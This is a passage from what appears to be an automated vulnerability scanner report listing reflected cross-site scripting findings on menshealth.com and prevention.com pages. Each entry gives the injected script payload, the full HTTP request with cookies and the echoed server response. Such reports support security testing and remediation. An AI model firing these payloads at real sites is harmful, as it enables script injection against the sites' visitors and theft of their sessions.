Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:18:11 GMT
Date: Thu, 10 Mar 2011 16:48:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<a href="http://www.menshealth.com/fitness/sports-injuriese37b4"><img src=a onerror=alert(1)>e635af9fc62/recent-10">
...[SNIP]...

2.67. http://www.menshealth.com/mhlists/Best_and_Worst_Cities_for_Men_2010/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/Best_and_Worst_Cities_for_Men_2010/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c56ed"><script>alert(1)</script>8b695b0b03f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/Best_and_Worst_Cities_for_Men_2010/?c56ed"><script>alert(1)</script>8b695b0b03f=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - The Best and Worst Cities for Men 2010&amp;body=http://www.menshealth.com/mhlists/Best_and_Worst_Cities_for_Men_2010/?c56ed"><script>alert(1)</script>8b695b0b03f=1">
...[SNIP]...

2.68. http://www.menshealth.com/mhlists/change_your_workout/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/change_your_workout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4e7"><script>alert(1)</script>93b2e3e760a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/change_your_workout/?cd4e7"><script>alert(1)</script>93b2e3e760a=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - Switch Up a Boring Workout for Better Results&amp;body=http://www.menshealth.com/mhlists/change_your_workout/?cd4e7"><script>alert(1)</script>93b2e3e760a=1">
...[SNIP]...

2.69. http://www.menshealth.com/mhlists/lose_weight/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/lose_weight/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2265b"><script>alert(1)</script>38008c984f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/lose_weight/index.php?2265b"><script>alert(1)</script>38008c984f8=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - 9 Weight-Loss Rules that Work&amp;body=http://www.menshealth.com/mhlists/lose_weight/index.php?2265b"><script>alert(1)</script>38008c984f8=1">
...[SNIP]...

2.70. http://www.menshealth.com/mhlists/sculpt_rock_hard_abs/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/sculpt_rock_hard_abs/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be25a"><script>alert(1)</script>b3a5e873588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/sculpt_rock_hard_abs/index.php?be25a"><script>alert(1)</script>b3a5e873588=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - Sculpt Rock-Hard Abs in 5 Steps&amp;body=http://www.menshealth.com/mhlists/sculpt_rock_hard_abs/index.php?be25a"><script>alert(1)</script>b3a5e873588=1">
...[SNIP]...

2.71. http://www.menshealth.com/mhlists/women_s_secrets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/women_s_secrets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3784e"><script>alert(1)</script>b1a5f15c19f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/women_s_secrets/?3784e"><script>alert(1)</script>b1a5f15c19f=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - 30 Secrets Every Woman Keeps from Her Man&amp;body=http://www.menshealth.com/mhlists/women_s_secrets/?3784e"><script>alert(1)</script>b1a5f15c19f=1">
...[SNIP]...

2.72. http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d69c5'style%3d'x%3aexpression(alert(1))'f84949f2dcb was submitted in the REST URL parameter 5. This input was echoed as d69c5'style='x:expression(alert(1))'f84949f2dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beautyd69c5'style%3d'x%3aexpression(alert(1))'f84949f2dcb/makeup/bobbi.brown HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:05:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' name='channel' value='lifelong.beautyd69c5'style='x:expression(alert(1))'f84949f2dcb' >
...[SNIP]...

2.73. http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203 was submitted in the REST URL parameter 6. This input was echoed as eb53a'style='x:expression(alert(1))'f8b875ad203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:05:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' name='category' value='eb53a'style='x:expression(alert(1))'f8b875ad203' >
...[SNIP]...

2.74. http://www.prevention.com/cda/categorypage.do [category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the category request parameter is copied into an HTML comment. The payload 1ccff--><script>alert(1)</script>9f6b2966833 was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices&category=1ccff--><script>alert(1)</script>9f6b2966833&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000MHiT6PFBG0R40pivkWtXpec:145vrsjai; Path=/
Content-Length: 66032

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<!-- CK: -channel-newsvoices-category-1ccff--><script>alert(1)</script>9f6b2966833-categorylisting Generated at Thu Mar 10 12:04:51 EST 2011-->
...[SNIP]...

2.75. http://www.prevention.com/cda/categorypage.do [category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f47b9"><script>alert(1)</script>91b875ad3d2 was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices&category=f47b9"><script>alert(1)</script>91b875ad3d2&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000ea5RHMtAJ24-ypFfHS_uFIL:145vrsjho; Path=/
Content-Length: 66068

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/newsvoices;topic=f47b9"><script>alert(1)</script>91b875ad3d2;sbtpc=slideshows;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.76. http://www.prevention.com/cda/categorypage.do [category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a8a3</script><script>alert(1)</script>8c04b44dec1 was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices&category=5a8a3</script><script>alert(1)</script>8c04b44dec1&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000SnHqX0d1m7-Kh50cYwu8Lvp:145vrsjho; Path=/
Content-Length: 66124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<!-- hide from non-JavaScript browsers
       var ord=Math.random()*10000000000000000;
       var tile= 1;
       var num = ord + "?";
       
                           
                   var topic= "5a8a3</script><script>alert(1)</script>8c04b44dec1";
       
       
                           var sbtpc= "slideshows";
       

                           var cat= "";
       
       
       var    querystring = location.search.substring(1);
       var querystringArray = querystring.split("&");
       var s
...[SNIP]...

2.77. http://www.prevention.com/cda/categorypage.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the channel request parameter is copied into an HTML comment. The payload d4987--><script>alert(1)</script>846ba86fdc2 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voicesd4987--><script>alert(1)</script>846ba86fdc2&category=multimedia&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000iUCmpjwqQ5TNypFA7u9eQEE:145vrsjai; Path=/
Content-Length: 65345

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<!-- CK: -channel-newsvoicesd4987--><script>alert(1)</script>846ba86fdc2-header-refreshAdTag-false Generated at Thu Mar 10 12:04:37 EST 2011-->
...[SNIP]...

2.78. http://www.prevention.com/cda/categorypage.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17009"><script>alert(1)</script>ec616cf732c was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices17009"><script>alert(1)</script>ec616cf732c&category=multimedia&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000u-jMr-9WCiCHL5pCz7Ims5c:145vrsjho; Path=/
Content-Length: 65326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/newsvoices17009"><script>alert(1)</script>ec616cf732c;topic=multimedia;sbtpc=slideshows;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.79. http://www.prevention.com/cda/categorypage.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c3eff'><script>alert(1)</script>ead12cfdf23 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voicesc3eff'><script>alert(1)</script>ead12cfdf23&category=multimedia&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000OS3jp_w-U-JUC1e9v_v1NSR:145vrsjai; Path=/
Content-Length: 65326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<input type='hidden' name='channel' value='news.voicesc3eff'><script>alert(1)</script>ead12cfdf23' >
...[SNIP]...

2.80. http://www.prevention.com/cda/categorypage.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ba1e'%3balert(1)//78788485c98 was submitted in the channel parameter. This input was echoed as 8ba1e';alert(1)//78788485c98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices8ba1e'%3balert(1)//78788485c98&category=multimedia&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00003c0wv2W7dOTZ72nC-QVFVhn:145vrsjho; Path=/
Content-Length: 64827

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/newsvoices8ba1e';alert(1)//78788485c98;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.81. http://www.prevention.com/cda/channelpage.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/channelpage.do

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dda04'%3balert(1)//7f033c0665c was submitted in the channel parameter. This input was echoed as dda04';alert(1)//7f033c0665c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/channelpage.do?channel=dda04'%3balert(1)//7f033c0665c HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00004OEwLPeeKy3O7OwRnRRVX2D:145vrsjai; Path=/
Content-Length: 64565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/dda04';alert(1)//7f033c0665c;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.82. http://www.prevention.com/cda/channelpage.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/channelpage.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696b5"><script>alert(1)</script>0347072cfe was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/channelpage.do?channel=696b5"><script>alert(1)</script>0347072cfe HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00009pX5xY_v7bPcTUcTjRVteHC:145vrsjai; Path=/
Content-Length: 64808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/696b5"><script>alert(1)</script>0347072cfe;topic=;sbtpc=;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.83. http://www.prevention.com/cda/channelpage.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/channelpage.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f64a'><script>alert(1)</script>d5f9ba885bc was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

